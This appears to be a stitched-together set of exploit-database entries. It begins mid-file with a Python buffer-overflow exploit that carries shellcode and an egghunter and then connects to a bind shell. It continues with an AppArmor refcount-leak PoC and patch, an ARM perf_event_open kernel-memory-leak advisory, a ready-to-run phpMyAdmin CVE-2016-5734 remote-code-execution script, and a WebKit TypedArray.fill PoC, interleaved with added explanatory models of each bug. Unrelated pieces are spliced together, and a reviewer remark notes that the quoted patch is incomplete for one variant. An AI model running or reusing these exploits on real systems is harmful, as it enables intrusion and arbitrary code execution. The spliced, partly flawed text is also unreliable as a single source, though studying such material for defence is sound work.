rekt += "\xf2\x31\x25\x04\x88\xc3\xef\x54\x71\x6f\xce\x58\x80"
rekt += "\x71\x17\x5e\x7b\x04\x61\x9c\x06\x1f\xb6\xde\xdc\xaa"
rekt += "\x2c\x78\x96\x0d\x88\x78\x7b\xcb\x5b\x76\x30\x9f\x03"
rekt += "\x9b\xc7\x4c\x38\xa7\x4c\x73\xee\x21\x16\x50\x2a\x69"
rekt += "\xcc\xf9\x6b\xd7\xa3\x06\x6b\xb8\x1c\xa3\xe0\x55\x48"
rekt += "\xde\xab\x31\xbd\xd3\x53\xc2\xa9\x64\x20\xf0\x76\xdf"
rekt += "\xae\xb8\xff\xf9\x29\xbe\xd5\xbe\xa5\x41\xd6\xbe\xec"
rekt += "\x85\x82\xee\x86\x2c\xab\x64\x56\xd0\x7e\x10\x5e\x77"
rekt += "\xd1\x07\xa3\xc7\x81\x87\x0b\xa0\xcb\x07\x74\xd0\xf3"
rekt += "\xcd\x1d\x79\x0e\xee\xf5\x4b\x87\x08\x9f\xbb\xc1\x83"
rekt += "\x37\x7e\x36\x1c\xa0\x81\x1c\x34\x46\xc9\x76\x83\x69"
rekt += "\xca\x5c\xa3\xfd\x41\xb3\x77\x1c\x56\x9e\xdf\x49\xc1"
rekt += "\x54\x8e\x38\x73\x68\x9b\xaa\x10\xfb\x40\x2a\x5e\xe0"
rekt += "\xde\x7d\x37\xd6\x16\xeb\xa5\x41\x81\x09\x34\x17\xea"
rekt += "\x89\xe3\xe4\xf5\x10\x61\x50\xd2\x02\xbf\x59\x5e\x76"
rekt += "\x6f\x0c\x08\x20\xc9\xe6\xfa\x9a\x83\x55\x55\x4a\x55"
rekt += "\x96\x66\x0c\x5a\xf3\x10\xf0\xeb\xaa\x64\x0f\xc3\x3a"
rekt += "\x61\x68\x39\xdb\x8e\xa3\xf9\xeb\xc4\xe9\xa8\x63\x81"
rekt += "\x78\xe9\xe9\x32\x57\x2e\x14\xb1\x5d\xcf\xe3\xa9\x14"
rekt += "\xca\xa8\x6d\xc5\xa6\xa1\x1b\xe9\x15\xc1\x09"
# Our tag is hive: \x68\x69\x76\x65
egghunter = ''
egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c'
egghunter += '\x05\x5a\x74\xef\xb8\x68\x69\x76\x65\x8b\xfa\xaf\x75'
egghunter += '\xea\xaf\x75\xe7\xff\xe7'
crash = "A" * 4061
crash += pack('<L', 0x909006eb)
crash += pack('<L', 0x10019ce3)
crash += egghunter
crash += "D" * (5500 - 4061 - 8 - len(egghunter))
payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)
payload += 'hivehive'
payload += rekt
payload += 'E' * (800 - len(rekt))
print '[+] Trying to exploit {}...'.format(host)
try:
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, 80))
print '[+] Sending payload...'
s.send(payload)
s.close()
print '[+] Trying to connect to target...\n'
try:
sleep(2)
call(['ncat', host, '54321'])
except:
print '[!] Whoops!! Something went wrong?'
except:
print '[!] Whoops!! Something went wrong?'
finally:
print '\n[+] I <3 SHELLS'
/*
There's a reference count leak in aa_fs_seq_hash_show that can be used to overflow the reference counter and trigger a kernel use-after-free:
static int aa_fs_seq_hash_show(struct seq_file *seq, void *v)
{
struct aa_replacedby *r = seq->private;
struct aa_profile *profile = aa_get_profile_rcu(&r->profile); // <--- takes a reference on profile
unsigned int i, size = aa_hash_size();
if (profile->hash) {
for (i = 0; i < size; i++)
seq_printf(seq, "%.2x", profile->hash[i]);
seq_puts(seq, "\n");
}
return 0;
} // <-- no reference dropped
See attached for a PoC that triggers a use-after-free on an aa_label object on Ubuntu 15.10 with the latest 4.2.0.35 kernel; the Ubuntu kernel appears to use an older version of AppArmor prior to some refactoring, but the same issue is present.
static int aa_fs_seq_hash_show(struct seq_file *seq, void *v)
{
struct aa_replacedby *r = seq->private;
struct aa_label *label = aa_get_label_rcu(&r->label); // <--- takes a reference on label
struct aa_profile *profile = labels_profile(label);
unsigned int i, size = aa_hash_size();
if (profile->hash) {
for (i = 0; i < size; i++)
seq_printf(seq, "%.2x", profile->hash[i]);
seq_puts(seq, "\n");
}
return 0;
} // <--- no reference dropped
I noticed, in reproducing this issue, that a patch fixing this appears to have been applied to the very latest Ubuntu kernel shipped in 16.04, but it hasn't been upstreamed or backported.
The fix is just to correctly drop the acquired reference.
index ad4fa49..798d492 100644
--- a/security/apparmor/apparmorfs.c
+++ b/security/apparmor/apparmorfs.c
@@ -331,6 +331,7 @@ static int aa_fs_seq_hash_show(struct seq_file *seq, void *v)
seq_printf(seq, "%.2x", profile->hash[i]);
seq_puts(seq, "\n");
}
+ aa_put_profile(profile);
return 0;
}
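Review bot: the drop added here is on `profile`, which is right for the upstream variant quoted first, where `aa_get_profile_rcu(&r->profile)` took the reference; the Ubuntu variant quoted just before the patch takes its reference with `aa_get_label_rcu(&r->label)` and only derives `profile` through `labels_profile(label)`, so in that tree the release has to be on the label (the label counterpart of `aa_put_profile`), otherwise the leak persists there. Placing the put after the `if (profile->hash)` block, as done, covers both branches; a short comment that the get at the top must be paired with a put on every return path would protect the fix if a later change adds an early return.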
*/
#include <unistd.h>
#include <fcntl.h>
#include <keyutils.h>
#include <err.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/wait.h>      /* wait() */
#include <sys/apparmor.h>
#define BASE_PATH "/sys/kernel/security/apparmor/policy/profiles/sbin.dhclient.2"
#define HASH_PATH BASE_PATH "/sha1"
void add_references(int hash_fd, int refs_to_add) {
char buf[1];
for (int i = 0; i < refs_to_add; ++i) {
pread(hash_fd, buf, sizeof(buf), 0);
}
}
int main(int argc, char** argv) {
int hash_fd;
int fds[0x100];
pid_t pid;
hash_fd = open(HASH_PATH, O_RDONLY);
if (hash_fd < 0) {
err(-1, "failed to open HASH_PATH");
}
fprintf(stderr, "[*] forking to speed up initial reference count increments\n");
for (int i = 0; i < 0xf; ++i) {
if (!fork()) {
add_references(hash_fd, 0x11111100);
exit(0);
}
}
for (int i = 0; i < 0xf; ++i) {
int status;
wait(&status);
}
fprintf(stderr, "[*] initial reference count increase finished\n");
fprintf(stderr, "[*] entering profile\n");
aa_change_profile("/sbin/dhclient");
pid = fork();
if (pid) {
for (int i = 0; i < 0x100; ++i) {
fds[i] = open("/proc/self/net/arp", O_RDONLY);
}
}
else {
add_references(hash_fd, 0x100);
exit(0);
}
fprintf(stderr, "[*] past the point of no return\n");
sleep(5);
for (int i = 0; i < 0x100; ++i) {
close(fds[i]);
}
}
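Why a leaked get is a memory-safety bug rather than just a resource leak, as an added user-space model that is not part of the PoC above: the PoC's forks drive the 32-bit counter most of the way round, the remaining reads wrap it to a small value, and the next legitimate get/put pair (the /proc open/close calls) then drops it to zero while the original holder still uses the object. The same sequence against a saturating counter, modelled on the kernel's later refcount_t (the REFCOUNT_SATURATED threshold used here is an assumption), turns the overflow into a permanent leak that is never freed. The bulk `_n` helpers stand in for the billions of individual reads so the model runs instantly.

```c
#include <stdint.h>
#include <stdio.h>

/* Assumption: saturation threshold in the style of the kernel's refcount_t. */
#define REFCOUNT_SATURATED 0xC0000000u

struct obj {
    uint32_t refs;
    int freed;
};

/* ---- plain atomic_t-style counter: wraps silently ---- */
void plain_get(struct obj *o)               { o->refs++; }
void plain_get_n(struct obj *o, uint64_t n) { o->refs = (uint32_t)(o->refs + n); }
int plain_put(struct obj *o)                /* 1 if this put freed the object */
{
    if (--o->refs == 0) { o->freed = 1; return 1; }
    return 0;
}

/* ---- saturating counter: once in the saturation band it never moves ---- */
int sat_get(struct obj *o)                  /* 0 when the counter is stuck */
{
    if (o->refs >= REFCOUNT_SATURATED) { o->refs = REFCOUNT_SATURATED; return 0; }
    o->refs++;
    return 1;
}
void sat_get_n(struct obj *o, uint64_t n)
{
    uint64_t v = (uint64_t)o->refs + n;
    o->refs = v >= REFCOUNT_SATURATED ? REFCOUNT_SATURATED : (uint32_t)v;
}
int sat_put(struct obj *o)
{
    if (o->refs >= REFCOUNT_SATURATED) return 0;   /* saturated: leak, never free */
    if (o->refs == 0) return 0;                    /* put without get: refuse */
    if (--o->refs == 0) { o->freed = 1; return 1; }
    return 0;
}

/*
 * Model of the PoC's sequence: one long-lived holder keeps a reference;
 * 'leaked' gets arrive with no matching put (the seq_file reads); then an
 * unrelated get/put pair happens (the /proc open/close). Returns 1 if the
 * object is freed while the long-lived holder still uses it: the use-after-free.
 */
int leak_then_churn(uint64_t leaked, int saturating)
{
    struct obj o = { 1, 0 };
    if (saturating) {
        sat_get_n(&o, leaked);
        sat_get(&o);
        sat_put(&o);
    } else {
        plain_get_n(&o, leaked);
        plain_get(&o);
        plain_put(&o);
    }
    return o.freed;
}

int main(void)
{
    printf("plain,      5 leaked refs:      uaf=%d\n", leak_then_churn(5, 0));
    printf("plain,      2^32-1 leaked refs: uaf=%d\n", leak_then_churn(0xFFFFFFFFull, 0));
    printf("saturating, 2^32-1 leaked refs: uaf=%d\n", leak_then_churn(0xFFFFFFFFull, 1));
    return 0;
}
```

The detection angle follows from the model: a counter that only ever climbs is the symptom, so a get paired with no put on a path reachable by unprivileged reads (here, any open of the `sha1` file) is what review and static checks should look for.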
perf_event_open() offers to collect various pieces of information when an event occurs, including a user stack backtrace (PERF_SAMPLE_CALLCHAIN). To collect a user stack backtrace, the kernel grabs the userland register state (if the event occurred in kernelspace: the userland register state that was recorded on syscall entry), then walks the stackframes by following framepointers.
On ARM, the step from one stackframe to the next one is implemented in arch/arm/kernel/perf_callchain.c as follows:
/*
* Get the return address for a single stackframe and return a pointer to the
* next frame tail.
*/
static struct frame_tail __user *
user_backtrace(struct frame_tail __user *tail,
struct perf_callchain_entry *entry)
{
struct frame_tail buftail;
unsigned long err;
if (!access_ok(VERIFY_READ, tail, sizeof(buftail)))
return NULL;
pagefault_disable();
err = __copy_from_user_inatomic(&buftail, tail, sizeof(buftail));
pagefault_enable();
if (err)
return NULL;
perf_callchain_store(entry, buftail.lr);
/*
* Frame pointers should strictly progress back up the stack
* (towards higher addresses).
*/
if (tail + 1 >= buftail.fp)
return NULL;
return buftail.fp - 1;
}
The access_ok() check is intended to prevent a malicious userland process from abusing the perf_event_open() API to leak kernelspace data. However, access_ok() does not actually check anything in set_fs(KERNEL_DS) sections, and performance events can occur in pretty much any context. Therefore, by causing a performance event to fire while e.g. the splice() syscall is running under KERNEL_DS, an attacker can circumvent this protection.
(The "tail + 1 >= buftail.fp" check has no relevance for an attacker; kernelspace addresses are higher than userspace addresses.)
After circumventing the protection, the attacker can set up a stackframe whose frame pointer points to an arbitrary kernelspace address. The kernel will follow that frame pointer, read the "saved link register" through it and make the result accessible to userspace. Therefore, this vulnerability can be used to read arbitrary kernelspace data.
The attached exploit can be used to leak 4 bytes at an arbitrary address, like this (tested on a Nexus 6, which runs a kernel based on upstream version 3.10, with a userdebug build that allows the shell user to get a root shell using "su"):
shell@shamu:/ $ su
root@shamu:/ # echo 0 > /proc/sys/kernel/kptr_restrict
root@shamu:/ # grep max_lock_depth /proc/kallsyms
c1042dc0 D max_lock_depth
root@shamu:/ # exit
shell@shamu:/ $ cat /proc/sys/kernel/max_lock_depth
1025
shell@shamu:/ $ /data/local/tmp/poc 0xc1042dc0
attempting to leak 0xc1042dc0
fake stackframe: fp=0xbeafd920
data_head is at e8
SUCCESS: 0x00000401
SUCCESS: 0x00000401
shell@shamu:/ $ su
root@shamu:/ # echo 4100 > /proc/sys/kernel/max_lock_depth
root@shamu:/ # exit
shell@shamu:/ $ /data/local/tmp/poc 0xc1042dc0
attempting to leak 0xc1042dc0
fake stackframe: fp=0xbecbd920
data_head is at e8
SUCCESS: 0x00001004
SUCCESS: 0x00001004
(The number behind the "SUCCESS: " message is the leaked value.)
On recent kernels, the issue could be attacked more reliably using software events or tracepoints - however, before commit b3eac026 (first contained in Linux 4.2), there is no implementation of perf_arch_fetch_caller_regs() on ARM, making it impossible to exploit the issue that way.
The arm64 implementation seems to have the same issues as the arm implementation. The x86 code also looks dodgy and has an access_ok() check, but can't be exploited this way because of the valid_user_frame() check that occurs directly after the values have been read through the potentially-kernelspace pointer.
Regarding other architectures (which I haven't looked into in much detail because they seem less important): Interestingly, sparc already has a safe implementation that explicitly uses set_fs(USER_DS) to make access_ok() safe. tile doesn't seem to even make an effort to differentiate between kernelspace and userspace stacks at a first glance. xtensa has some code, but it looks dodgy. metag also has the bad access_ok() check, but does some sanity checking afterwards that makes it harder to attack. The powerpc code looks secure.
I have attached a completely untested patch that should fix the x86, arm and arm64 code.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40182.zip
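A user-space model of the frame walk in user_backtrace() with the check the advisory says is missing, as an added example that is neither kernel code nor the attached patch: before each frame is read, its address is tested against a fixed user/kernel boundary that does not depend on the current set_fs() state, which is what access_ok() fails to provide under KERNEL_DS. The fake address space, the TASK_SIZE value and the frame contents are constructed; the kernel address used for the hostile frame is the max_lock_depth address from the transcript above. A counter records every read the walker aims at the kernel half, so the unchecked and checked walks can be compared.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define TASK_SIZE 0xbf000000u   /* assumption: a common ARM 3G/1G split */
#define MAX_DEPTH 8

struct frame_tail { uint32_t fp; uint32_t lr; };   /* layout as in the kernel */

/* Fake user address space: a 4 KiB window backed by an array. */
#define USER_BASE 0xbeafd000u
static uint8_t user_mem[0x1000];
static int kernel_reads_attempted;

void write_frame(uint32_t tail, uint32_t fp, uint32_t lr)
{
    struct frame_tail f = { fp, lr };
    memcpy(user_mem + (tail - USER_BASE), &f, sizeof f);
}

/* Stands in for __copy_from_user_inatomic(). Every read aimed at the kernel
 * half is counted, since that is the read the real code would perform under
 * KERNEL_DS; here it simply fails because nothing backs that range. */
static int read_user(uint32_t addr, void *dst, size_t len)
{
    if (addr >= TASK_SIZE)
        kernel_reads_attempted++;
    if (addr < USER_BASE || (uint64_t)addr + len > USER_BASE + sizeof user_mem)
        return -1;
    memcpy(dst, user_mem + (addr - USER_BASE), len);
    return 0;
}
int  kernel_read_attempts(void)       { return kernel_reads_attempted; }
void reset_kernel_read_attempts(void) { kernel_reads_attempted = 0; }

/* The missing check: an explicit user-range test for the whole frame. */
int valid_user_frame(uint32_t tail)
{
    return tail < TASK_SIZE && tail + sizeof(struct frame_tail) <= TASK_SIZE;
}

/* Walks the frame chain from fp as user_backtrace() does, collecting saved
 * link registers. With check_frames set, every tail is range-checked before
 * it is read. Returns the number of entries stored. */
int user_backtrace(uint32_t fp, uint32_t *out, int max, int check_frames)
{
    int n = 0;
    uint32_t tail = fp - sizeof(struct frame_tail);   /* kernel: ARM_fp - 1 */
    while (n < max) {
        struct frame_tail buf;
        if (check_frames && !valid_user_frame(tail))
            break;
        if (read_user(tail, &buf, sizeof buf) != 0)
            break;
        out[n++] = buf.lr;
        if (tail + sizeof buf >= buf.fp)     /* frames must move up the stack */
            break;
        tail = buf.fp - sizeof buf;
    }
    return n;
}

int main(void)
{
    uint32_t lrs[MAX_DEPTH];
    /* Constructed chain of three benign frames. */
    write_frame(0xbeafd0f8u, 0xbeafd200u, 0x00010001u);
    write_frame(0xbeafd1f8u, 0xbeafd300u, 0x00010002u);
    write_frame(0xbeafd2f8u, 0u,          0x00010003u);
    int n = user_backtrace(0xbeafd100u, lrs, MAX_DEPTH, 1);
    printf("benign chain:   %d frames\n", n);

    /* First frame now points into the kernel (address from the transcript). */
    write_frame(0xbeafd0f8u, 0xc1042dc0u + sizeof(struct frame_tail), 0x00010001u);
    reset_kernel_read_attempts();
    n = user_backtrace(0xbeafd100u, lrs, MAX_DEPTH, 0);
    printf("unchecked walk: %d frames, kernel reads attempted: %d\n", n, kernel_read_attempts());
    reset_kernel_read_attempts();
    n = user_backtrace(0xbeafd100u, lrs, MAX_DEPTH, 1);
    printf("checked walk:   %d frames, kernel reads attempted: %d\n", n, kernel_read_attempts());
    return 0;
}
```

The "frames must move up the stack" test is kept because it terminates the walk on a zero fp, but as the advisory notes it contributes nothing to safety, since kernel addresses lie above user addresses and pass it; only the explicit range check stops the read.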
#!/usr/bin/env python
"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Works only with PHP 4.3.0-5.4.6 versions, because of the regex break with a null byte that was fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
"""
import requests
import argparse
import sys
__author__ = "@iamsecurity"
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("url", type=str, help="URL with path to PMA")
parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")
parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user")
parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")
parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server")
parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.")
arguments = parser.parse_args()
url_to_pma = arguments.url
uname = arguments.user
upass = arguments.pwd
if arguments.dbs:
db = arguments.dbs
else:
db = "test"
token = False
custom_table = False
if arguments.table:
custom_table = True
table = arguments.table
else:
table = "prgpwn"
if arguments.cmd:
payload = arguments.cmd
else:
payload = "system('uname -a');"
size = 32
s = requests.Session()
# you can manually add proxy support it's very simple ;)
# s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
s.verify = False
sql = '''CREATE TABLE `{0}` (
`first` varchar(10) CHARACTER SET utf8 NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));
'''.format(table)
# get_token
resp = s.post(url_to_pma + "/?lang=en", dict(
pma_username=uname,
pma_password=upass
))
if resp.status_code is 200:
token_place = resp.text.find("token=") + 6
token = resp.text[token_place:token_place + 32]
if token is False:
print("Cannot get valid authorization token.")
sys.exit(1)
if custom_table is False:
data = {
"is_js_confirmed": "0",
"db": db,
"token": token,
"pos": "0",
"sql_query": sql,
"sql_delimiter": ";",
"show_query": "0",
"fk_checks": "0",
"SQL": "Go",
"ajax_request": "true",
"ajax_page_request": "true",
}
resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))
if resp.status_code == 200:
if "success" in resp.json():
if resp.json()["success"] is False:
first = resp.json()["error"][resp.json()["error"].find("<code>")+6:]
error = first[:first.find("</code>")]
if "already exists" in error:
print(error)
else:
print("ERROR: " + error)
sys.exit(1)
# build exploit
exploit = {
"db": db,
"table": table,
"token": token,
"goto": "sql.php",
"find": "0/e\0",
"replaceWith": payload,
"columnIndex": "0",
"useRegex": "on",
"submit": "Go",
"ajax_request": "true"
}
resp = s.post(
url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies)
)
if resp.status_code == 200:
result = resp.json()["message"][resp.json()["message"].find("</a>")+8:]
if len(result):
print("result: " + result)
sys.exit(0)
print(
"Exploit failed!\n"
"Try to manually set exploit parameters like --table, --database and --token.\n"
"Remember that servers with PHP version greater than 5.4.6"
" is not exploitable, because of warning about null byte in regexp"
)
sys.exit(1)
<!--
There is a bug in TypedArray.fill that can be used to write to an absolute pointer.
In JavaScriptCore/runtime/JSGenericTypedArrayViewPrototypeFunctions.h, the function genericTypedArrayViewProtoFuncFill contains the following code:
unsigned length = thisObject->length();
unsigned begin = argumentClampedIndexFromStartOrEnd(exec, 1, length);
unsigned end = argumentClampedIndexFromStartOrEnd(exec, 2, length, length);
if (end < begin)
return JSValue::encode(exec->thisValue());
if (!thisObject->setRangeToValue(exec, begin, end, valueToInsert))
return JSValue::encode(jsUndefined());
argumentClampedIndexFromStartOrEnd will call valueOf on a parameter to the fill function, which can contain a function that neuters the this array, causing the pointer used by setRangeToValue to be null. However, the begin and end variables can be very large values, up to 0x7fffffff, which could be valid pointers on ARM and 32-bit platforms. This allows an absolute pointer in this range to be written to.
An HTML file demonstrating this issue is attached. This issue affects Safari Technology Preview and WebKit, but has not made it into production Safari yet (TypedArray.fill is not supported).
Note that there are three places where script can be executed after the neutered check in this function: the begin and end parameters, and the value, which is converted in setRangeToValue. To fix this issue, a check needs to be performed after the value has been converted.
-->
<html>
<body>
<script>
function f(){
try{
alert("t");
postMessage("test", "http://127.0.0.1", [q])
alert(a.byteLength);
alert(q.byteLength);
} catch(e){
alert(e.message);
alert(a.byteLength)
alert(q.byteLength);
}
return 0x12345678;
}
alert(Date);
var q = new ArrayBuffer(0x7fffffff);
var o = {valueOf : f}
var a = new Uint8Array(q);
// alert(q.byteLength);
var t = [];
try{
a.fill(0x12, o, 0x77777777);
} catch(e){
alert(e.message);
}
</script>
</body>
</html>
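The ordering problem described in the comment above, as an added C++ model that is not WebKit code: ViewModel, clampIndex, fillVulnerable and fillHardened are stand-ins for JSC's typed-array view, argumentClampedIndexFromStartOrEnd and genericTypedArrayViewProtoFuncFill, and the valueOf conversions are modelled as callbacks. The vulnerable ordering checks for a neutered view once, then runs three conversions that may neuter it and clamps against a length cached before those conversions; the hardened ordering re-validates the view and re-clamps after the last point where script can run.

```cpp
// Added model of the TypedArray.fill ordering bug, not WebKit code. The names below are
// assumptions chosen for the model.
#include <algorithm>
#include <cstdint>
#include <functional>
#include <vector>

// A typed-array view: a raw pointer into backing storage plus a cached length.
struct ViewModel {
    std::vector<uint8_t> storage;
    uint8_t* data;
    unsigned length;
    bool neutered = false;

    explicit ViewModel(unsigned len) : storage(len, 0), data(storage.data()), length(len) {}

    // What transferring the buffer via postMessage does in the PoC: the view loses its memory.
    void neuter() { storage.clear(); storage.shrink_to_fit(); data = nullptr; length = 0; neutered = true; }
};

// An argument whose valueOf conversion runs script; modelled as a callback returning the number.
using ArgThunk = std::function<long long()>;

// Mirrors argumentClampedIndexFromStartOrEnd: convert (script runs here), then clamp into
// [0, length]. The clamp uses the length handed in by the caller, which may be stale.
static unsigned clampIndex(const ArgThunk& arg, unsigned length, unsigned dflt) {
    if (!arg) return dflt;
    long long v = arg();
    if (v < 0) v += length;
    if (v < 0) return 0;
    if (v > static_cast<long long>(length)) return length;
    return static_cast<unsigned>(v);
}

struct FillOutcome {
    bool wouldWrite;     // the function reached the write
    uintptr_t firstAddr; // address of the first byte it targets (data + begin)
    unsigned count;      // number of bytes it targets
};

// Vulnerable ordering: the only neutered check precedes the three conversions. The real
// function writes unconditionally; this model writes only while the storage is still alive
// and otherwise just reports the address it would have written to.
static FillOutcome fillVulnerable(ViewModel& view, const ArgThunk& beginArg,
                                  const ArgThunk& endArg, const ArgThunk& valueArg) {
    if (view.neutered) return {false, 0, 0};
    unsigned length = view.length;                    // cached once, before any script runs
    unsigned begin = clampIndex(beginArg, length, 0); // script may neuter here
    unsigned end = clampIndex(endArg, length, length); // or here
    if (end < begin) return {false, 0, 0};
    uint8_t value = static_cast<uint8_t>(valueArg ? valueArg() : 0); // or here (setRangeToValue)
    uintptr_t target = reinterpret_cast<uintptr_t>(view.data) + begin;
    if (view.data != nullptr)
        std::fill(view.data + begin, view.data + end, value);
    return {true, target, end - begin};
}

// Hardened ordering: re-check the view after the last conversion and clamp against the
// current length rather than the cached one. A real engine would throw a TypeError.
static bool fillHardened(ViewModel& view, const ArgThunk& beginArg,
                         const ArgThunk& endArg, const ArgThunk& valueArg) {
    unsigned length = view.length;
    unsigned begin = clampIndex(beginArg, length, 0);
    unsigned end = clampIndex(endArg, length, length);
    uint8_t value = static_cast<uint8_t>(valueArg ? valueArg() : 0);
    if (view.neutered || view.data == nullptr) return false;
    end = std::min(end, view.length);
    begin = std::min(begin, end);
    std::fill(view.data + begin, view.data + end, value);
    return true;
}

// Scenario from the PoC: the begin argument's valueOf neuters the buffer, then returns an index.
static FillOutcome neuterScenarioVulnerable() {
    ViewModel view(0x1000);
    ArgThunk beginArg = [&view]() { view.neuter(); return 0x800; };
    return fillVulnerable(view, beginArg, []() { return 0xC00; }, []() { return 0x12; });
}

static bool neuterScenarioHardened() {
    ViewModel view(0x1000);
    ArgThunk beginArg = [&view]() { view.neuter(); return 0x800; };
    return fillHardened(view, beginArg, []() { return 0xC00; }, []() { return 0x12; });
}

// Benign use: fill bytes [2, 6) of a 16-byte view with 0x41 and report how many were set.
static unsigned benignScenario() {
    ViewModel view(16);
    fillHardened(view, []() { return 2; }, []() { return 6; }, []() { return 0x41; });
    return static_cast<unsigned>(std::count(view.storage.begin(), view.storage.end(), 0x41));
}
```

In the neutering scenario the vulnerable ordering reaches the write with a null data pointer and a begin of 0x800 taken from the stale length, so the address it targets is the bare index, which is the absolute-pointer write the report describes; the hardened ordering refuses because the re-check runs after every conversion point.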